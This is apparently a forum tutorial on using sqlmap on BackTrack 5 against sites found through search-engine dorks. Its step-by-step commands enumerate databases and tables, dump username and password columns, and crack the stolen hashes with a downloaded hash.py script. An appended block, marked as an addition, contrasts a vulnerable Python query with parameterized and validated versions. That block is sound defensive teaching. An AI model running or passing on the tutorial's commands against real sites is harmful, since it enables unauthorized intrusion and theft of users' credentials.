Hi, in this tutorial, I’ll be showing you a simple SQL Injection using BackTrack 5.
Quote:
[dbname] = Database name; [tbname] = Table name; [cmname] = Column name.
1. Open up sqlmap
2. Once we load the terminal, we wanna find a vulnerable site.
Use any dork or check any posted vulns.
3. Now, it’s time for the codes
Quote:
./sqlmap.py -u website.com/index.php?id=? --dbs
With this command, you’ll be able to extract the databases.
Looks like this:
3. Once we have the DBS, it’s time to get the tables.
Quote:
./sqlmap.py -u website.com/index.php?id=? -D [dbname] --tables
4. After we get the tables, we need to get the columns.
Now, we need to write:
Quote:
./sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] --columns
5. Once we get the columns
We need to dump the files.
Quote:
./sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] -C [cmname] --dump
Example: ./sqlmap.py -u website.com/index.php?id=? -D information_schema -T users -C username --dump
6. After we do this, we will get the encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
Download link for Hash.py: http://uploading.com/ee6e71ed/hash-py
1. Move it to /root
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py
Quote:
/root/hash.py
We have Online & Offline attack methods.
If you wanna use the offline method, you need a wordlist.
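The commands above only work when the site builds its SQL text from the `id` request parameter. As an added example (not part of the original tutorial), this shows that flaw beside the parameterized fix; Python's sqlite3, the `articles` table and the function names are assumptions standing in for the site's own PHP code and database.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the site's database.
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);"
        "INSERT INTO articles VALUES (1,'Welcome'),(2,'Draft'),(3,'Internal');"
    )
    return db

def lookup_vulnerable(db, raw_id):
    # The request value is concatenated into the SQL text, so the database
    # parses client input as part of the statement. This is the flaw that
    # makes a parameter like index.php?id= injectable.
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, raw_id):
    # Placeholder binding: the SQL text is fixed and the value is sent
    # separately, so it can only ever be compared as data.
    sql = "SELECT title FROM articles WHERE id = ?"
    return [row[0] for row in db.execute(sql, (raw_id,))]

def lookup_hardened(db, raw_id):
    # Validate first (this page only needs a short run of digits),
    # then bind. Rejecting early also gives a clean event to log on.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be numeric")
    return lookup_bound(db, int(raw_id))

if __name__ == "__main__":
    db = make_db()
    tampered = "2 OR 1=1"  # constructed textbook input that alters the WHERE clause
    print("vulnerable:", lookup_vulnerable(db, tampered))
    print("bound:     ", lookup_bound(db, tampered))
    try:
        lookup_hardened(db, tampered)
    except ValueError as exc:
        print("hardened:   rejected,", exc)
```

With binding in place the tampered value matches no row, and with validation it never reaches the database at all.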